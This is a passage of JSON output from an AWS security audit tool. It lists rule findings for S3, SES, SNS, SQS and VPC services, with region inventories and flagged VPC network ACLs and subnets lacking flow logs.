"Buckets","description": "Put actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"},"s3-bucket-world-policy-star": {"checked_items": 0,"dashboard_name": "Buckets","description": "All actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"}},"service": "s3","thread_config": {"list": 10,"parse": 20}},"ses": {"filters": {},"findings": {"ses-identity-world-SendEmail-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "SendEmail authorized to all principals","display_path": "ses.regions.id.identities.id","flagged_items": 0,"items": [],"level": "danger","path": "ses.regions.id.identities.id.policies.id.Statement.id","rationale": "N/A","service": "SES"},"ses-identity-world-SendRawEmail-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "SendRawEmail authorized to all principals","display_path": "ses.regions.id.identities.id","flagged_items": 0,"items": [],"level": "danger","path": "ses.regions.id.identities.id.policies.id.Statement.id","rationale": "N/A","service": "SES"}},"identities_count": 0,"regions": {"ap-south-1": {"identities": {},"identities_count": 0,"region": "ap-south-1"},"ap-southeast-2": {"identities": {},"identities_count": 0,"region": "ap-southeast-2"},"eu-central-1": {"identities": {},"identities_count": 0,"region": "eu-central-1"},"eu-west-1": {"identities": {},"identities_count": 0,"region": "eu-west-1"},"us-east-1": {"identities": {},"identities_count": 0,"region": "us-east-1"},"us-west-2": {"identities": {},"identities_count": 0,"region": "us-west-2"}},"regions_count": 6,"resource_types": {"global": [],"region": ["identities"],"vpc": []},"service": "ses","targets": {"first_region": [["identities","Identities","list_identities",{},false]],"other_regions": [["identities","Identities","list_identities",{},false]]},"thread_config": {"list": 10,"parse": 20}},"sns": {"filters": {},"findings": {"sns-topic-world-AddPermission-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "AddPermission authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-DeleteTopic-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "DeleteTopic authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-Publish-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "Publish authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-Receive-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "Receive authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-RemovePermission-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "RemovePermission authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-SetTopicAttributes-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "SetTopicAttributes authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"},"sns-topic-world-Subscribe-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "Subscribe authorized to all principals","display_path": "sns.regions.id.topics.id","flagged_items": 0,"items": [],"level": "danger","path": "sns.regions.id.topics.id.Policy.Statement.id","rationale": "N/A","service": "SNS"}},"regions": {"af-south-1": {"region": "af-south-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-east-1": {"region": "ap-east-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-northeast-1": {"region": "ap-northeast-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-northeast-2": {"region": "ap-northeast-2","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-northeast-3": {"region": "ap-northeast-3","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-south-1": {"region": "ap-south-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-southeast-1": {"region": "ap-southeast-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ap-southeast-2": {"region": "ap-southeast-2","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"ca-central-1": {"region": "ca-central-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-central-1": {"region": "eu-central-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-north-1": {"region": "eu-north-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-south-1": {"region": "eu-south-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-west-1": {"region": "eu-west-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-west-2": {"region": "eu-west-2","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"eu-west-3": {"region": "eu-west-3","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"me-south-1": {"region": "me-south-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"sa-east-1": {"region": "sa-east-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"us-east-1": {"region": "us-east-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"us-east-2": {"region": "us-east-2","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"us-west-1": {"region": "us-west-1","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0},"us-west-2": {"region": "us-west-2","subscriptions": {},"subscriptions_count": 0,"topics": {},"topics_count": 0}},"regions_count": 21,"resource_types": {"global": [],"region": ["topics","subscriptions"],"vpc": []},"service": "sns","subscriptions_count": 0,"targets": {"first_region": [["topics","Topics","list_topics",{},false],["subscriptions","Subscriptions","list_subscriptions",{"NextToken": "AAGgHpese+bpGYiJlIAtfSFQ3wnBMec1+obBXagxEqgsVg=="},false]],"other_regions": [["topics","Topics","list_topics",{},false],["subscriptions","Subscriptions","list_subscriptions",{"NextToken": "AAGgHpese+bpGYiJlIAtfSFQ3wnBMec1+obBXagxEqgsVg=="},false]]},"thread_config": {"list": 10,"parse": 20},"topics_count": 0},"sqs": {"filters": {},"findings": {"sqs-queue-world-ChangeMessageVisibility-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "ChangeMessageVisibility authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "danger","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-DeleteMessage-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "DeleteMessage authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "danger","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-GetQueueAttributes-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "GetQueueAttributes authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "warning","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-GetQueueUrl-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "GetQueueUrl authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "warning","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-PurgeQueue-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "PurgeQueue authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "danger","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-ReceiveMessage-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "ReceiveMessage authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "danger","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"},"sqs-queue-world-SendMessage-policy": {"checked_items": 0,"dashboard_name": "Statements","description": "SendMessage authorized to all principals","display_path": "sqs.regions.id.queues.id","flagged_items": 0,"items": [],"level": "danger","path": "sqs.regions.id.queues.id.Policy.Statement.id","rationale": "N/A","service": "SQS"}},"queues_count": 0,"regions": {"af-south-1": {"queues": {},"queues_count": 0,"region": "af-south-1"},"ap-east-1": {"queues": {},"queues_count": 0,"region": "ap-east-1"},"ap-northeast-1": {"queues": {},"queues_count": 0,"region": "ap-northeast-1"},"ap-northeast-2": {"queues": {},"queues_count": 0,"region": "ap-northeast-2"},"ap-northeast-3": {"queues": {},"queues_count": 0,"region": "ap-northeast-3"},"ap-south-1": {"queues": {},"queues_count": 0,"region": "ap-south-1"},"ap-southeast-1": {"queues": {},"queues_count": 0,"region": "ap-southeast-1"},"ap-southeast-2": {"queues": {},"queues_count": 0,"region": "ap-southeast-2"},"ca-central-1": {"queues": {},"queues_count": 0,"region": "ca-central-1"},"eu-central-1": {"queues": {},"queues_count": 0,"region": "eu-central-1"},"eu-north-1": {"queues": {},"queues_count": 0,"region": "eu-north-1"},"eu-south-1": {"queues": {},"queues_count": 0,"region": "eu-south-1"},"eu-west-1": {"queues": {},"queues_count": 0,"region": "eu-west-1"},"eu-west-2": {"queues": {},"queues_count": 0,"region": "eu-west-2"},"eu-west-3": {"queues": {},"queues_count": 0,"region": "eu-west-3"},"me-south-1": {"queues": {},"queues_count": 0,"region": "me-south-1"},"sa-east-1": {"queues": {},"queues_count": 0,"region": "sa-east-1"},"us-east-1": {"queues": {},"queues_count": 0,"region": "us-east-1"},"us-east-2": {"queues": {},"queues_count": 0,"region": "us-east-2"},"us-west-1": {"queues": {},"queues_count": 0,"region": "us-west-1"},"us-west-2": {"queues": {},"queues_count": 0,"region": "us-west-2"}},"regions_count": 21,"resource_types": {"global": [],"region": ["queues"],"vpc": []},"service": "sqs","targets": {"first_region": [["queues","QueueUrls","list_queues",{},false]],"other_regions": [["queues","QueueUrls","list_queues",{},false]]},"thread_config": {"list": 10,"parse": 20}},"vpc": {"customer_gateways_count": 0,"filters": {},"findings": {"vpc-custom-network-acls-allow-all-egress": {"checked_items": 17,"dashboard_name": "Network ACLs","description": "Network ACLs allow all egress traffic (custom)","flagged_items": 0,"id_suffix": "egress._GET_VALUE_AT_(vpc.regions.id.vpcs.id.network_acls.id.allow_all_egress_traffic)","items": [],"level": "warning","path": "vpc.regions.id.vpcs.id.network_acls.id","rationale": "Network ACLs are designed to provide a secondary layer of security. Adding a rule that allows all network traffic (all protocols, IPs, and destination) prior to any deny rule defeats the purpose of network ACLs.","service": "VPC"},"vpc-custom-network-acls-allow-all-ingress": {"checked_items": 17,"dashboard_name": "Network ACLs","description": "Network ACLs allow all ingress traffic (custom)","flagged_items": 0,"id_suffix": "ingress._GET_VALUE_AT_(vpc.regions.id.vpcs.id.network_acls.id.allow_all_ingress_traffic)","items": [],"level": "warning","path": "vpc.regions.id.vpcs.id.network_acls.id","rationale": "Network ACLs are designed to provide a secondary layer of security. Adding a rule that allows all network traffic (all protocols, IPs, and source) prior to any deny rule defeats the purpose of network ACLs.","service": "VPC"},"vpc-default-network-acls-allow-all-egress": {"checked_items": 17,"dashboard_name": "Network ACLs","description": "Network ACLs allow all egress traffic (default)","flagged_items": 17,"id_suffix": "egress._GET_VALUE_AT_(vpc.regions.id.vpcs.id.network_acls.id.allow_all_egress_traffic)","items": ["vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.network_acls.acl-c777e5a1.egress.100","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.network_acls.acl-75e1951e.egress.100","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.network_acls.acl-bb1b62d2.egress.100","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.network_acls.acl-a676adcd.egress.100","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.network_acls.acl-8787e0e1.egress.100","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.network_acls.acl-4e4dc228.egress.100","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.network_acls.acl-63e1ed0b.egress.100","vpc.regions.eu-central-1.vpcs.vpc-78b43312.network_acls.acl-6ebcec04.egress.100","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.network_acls.acl-dfb10ab6.egress.100","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.network_acls.acl-ed4be494.egress.100","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.network_acls.acl-003d0768.egress.100","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.network_acls.acl-c74e7dae.egress.100","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.network_acls.acl-43816e25.egress.100","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.network_acls.acl-f1a6ae8c.egress.100","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.network_acls.acl-b06507db.egress.100","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.network_acls.acl-14a0c772.egress.100","vpc.regions.us-west-2.vpcs.vpc-d45709ac.network_acls.acl-f76adc8c.egress.100"],"level": "warning","path": "vpc.regions.id.vpcs.id.network_acls.id","rationale": "Network ACLs are designed to provide a secondary layer of security. Adding a rule that allows all network traffic (all protocols, IPs, and destination) prior to any deny rule defeats the purpose of network ACLs.","service": "VPC"},"vpc-default-network-acls-allow-all-ingress": {"checked_items": 17,"dashboard_name": "Network ACLs","description": "Network ACLs allow all ingress traffic (default)","flagged_items": 17,"id_suffix": "ingress._GET_VALUE_AT_(vpc.regions.id.vpcs.id.network_acls.id.allow_all_ingress_traffic)","items": ["vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.network_acls.acl-c777e5a1.ingress.100","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.network_acls.acl-75e1951e.ingress.100","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.network_acls.acl-bb1b62d2.ingress.100","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.network_acls.acl-a676adcd.ingress.100","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.network_acls.acl-8787e0e1.ingress.100","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.network_acls.acl-4e4dc228.ingress.100","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.network_acls.acl-63e1ed0b.ingress.100","vpc.regions.eu-central-1.vpcs.vpc-78b43312.network_acls.acl-6ebcec04.ingress.100","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.network_acls.acl-dfb10ab6.ingress.100","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.network_acls.acl-ed4be494.ingress.100","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.network_acls.acl-003d0768.ingress.100","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.network_acls.acl-c74e7dae.ingress.100","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.network_acls.acl-43816e25.ingress.100","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.network_acls.acl-f1a6ae8c.ingress.100","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.network_acls.acl-b06507db.ingress.100","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.network_acls.acl-14a0c772.ingress.100","vpc.regions.us-west-2.vpcs.vpc-d45709ac.network_acls.acl-f76adc8c.ingress.100"],"level": "warning","path": "vpc.regions.id.vpcs.id.network_acls.id","rationale": "Network ACLs are designed to provide a secondary layer of security. Adding a rule that allows all network traffic (all protocols, IPs, and source) prior to any deny rule defeats the purpose of network ACLs.","service": "VPC"},"vpc-network-acl-not-used": {"checked_items": 17,"dashboard_name": "Network ACLs","description": "Unused network ACLs","flagged_items": 0,"id_suffix": "unused","items": [],"level": "warning","path": "vpc.regions.id.vpcs.id.network_acls.id","rationale": "Maintaining unused resources increases risks of misconfigurations and increases the difficulty of audits.","service": "VPC"},"vpc-subnet-with-allow-all-egress-acls": {"checked_items": 55,"dashboard_name": "Subnets","description": "Subnet with allow all egress NACLs","flagged_items": 55,"id_suffix": "bad_nacls","items": ["vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-7f50e154.bad_nacls","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-a668c6ee.bad_nacls","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-593d2502.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-e6ad198d.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-af6809d4.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-8447addb.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-cf001883.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-4dcc0924.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-546a8e2f.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-c1b6118c.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-f0fde498.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-d3c151a8.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-7d5a1431.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-2506d06d.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-a448d5fd.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-b73197d1.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-b3fe86eb.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-0c0bc26a.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-6cb44e24.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-1cd98b74.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-4f896210.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-85711fff.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-ecc66390.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-55d77f19.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-292d4343.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-1d972e74.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-fe16ce85.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-c98e7484.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b3a000e9.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b1c2a5d7.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-214f3969.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-edaf13a1.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-e682ec9c.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-43bf9d2a.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-b309b8fe.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-762a450d.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-e9e1b480.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-6a4dd723.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-9aa5c1fc.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-aaddbef1.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-6e61f24f.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-8c27ffbd.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-30be2f6f.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-77e07411.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-cbefcb86.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-7056187e.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-fac76891.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-81a1eccd.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-18e60365.bad_nacls","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-3162b36b.bad_nacls","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-64f07402.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-64dae84f.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-113ce95b.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-25f65d5d.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-1075cf4d.bad_nacls"],"level": "warning","path": "vpc.regions.id.vpcs.id.subnets.id","rationale": "Network ACLs associated with subnets and VPCs should not allow all egress traffic.","service": "VPC"},"vpc-subnet-with-allow-all-ingress-acls": {"checked_items": 55,"dashboard_name": "Subnets","description": "Subnet with allow all ingress NACLs","flagged_items": 55,"id_suffix": "bad_nacls","items": ["vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-7f50e154.bad_nacls","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-a668c6ee.bad_nacls","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-593d2502.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-e6ad198d.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-af6809d4.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-8447addb.bad_nacls","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-cf001883.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-4dcc0924.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-546a8e2f.bad_nacls","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-c1b6118c.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-f0fde498.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-d3c151a8.bad_nacls","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-7d5a1431.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-2506d06d.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-a448d5fd.bad_nacls","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-b73197d1.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-b3fe86eb.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-0c0bc26a.bad_nacls","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-6cb44e24.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-1cd98b74.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-4f896210.bad_nacls","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-85711fff.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-ecc66390.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-55d77f19.bad_nacls","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-292d4343.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-1d972e74.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-fe16ce85.bad_nacls","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-c98e7484.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b3a000e9.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b1c2a5d7.bad_nacls","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-214f3969.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-edaf13a1.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-e682ec9c.bad_nacls","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-43bf9d2a.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-b309b8fe.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-762a450d.bad_nacls","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-e9e1b480.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-6a4dd723.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-9aa5c1fc.bad_nacls","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-aaddbef1.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-6e61f24f.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-8c27ffbd.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-30be2f6f.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-77e07411.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-cbefcb86.bad_nacls","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-7056187e.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-fac76891.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-81a1eccd.bad_nacls","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-18e60365.bad_nacls","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-3162b36b.bad_nacls","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-64f07402.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-64dae84f.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-113ce95b.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-25f65d5d.bad_nacls","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-1075cf4d.bad_nacls"],"level": "warning","path": "vpc.regions.id.vpcs.id.subnets.id","rationale": "Network ACLs associated with subnets and VPCs should not allow all ingress traffic.","service": "VPC"},"vpc-subnet-without-flow-log": {"checked_items": 55,"dashboard_name": "Subnets","description": "Subnet without a flow log","flagged_items": 55,"id_suffix": "NoFlowLog","items": ["vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-7f50e154.NoFlowLog","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-a668c6ee.NoFlowLog","vpc.regions.ap-northeast-1.vpcs.vpc-0cbc506a.subnets.subnet-593d2502.NoFlowLog","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-e6ad198d.NoFlowLog","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-af6809d4.NoFlowLog","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-8447addb.NoFlowLog","vpc.regions.ap-northeast-2.vpcs.vpc-73f44e18.subnets.subnet-cf001883.NoFlowLog","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-4dcc0924.NoFlowLog","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-546a8e2f.NoFlowLog","vpc.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.subnets.subnet-c1b6118c.NoFlowLog","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-f0fde498.NoFlowLog","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-d3c151a8.NoFlowLog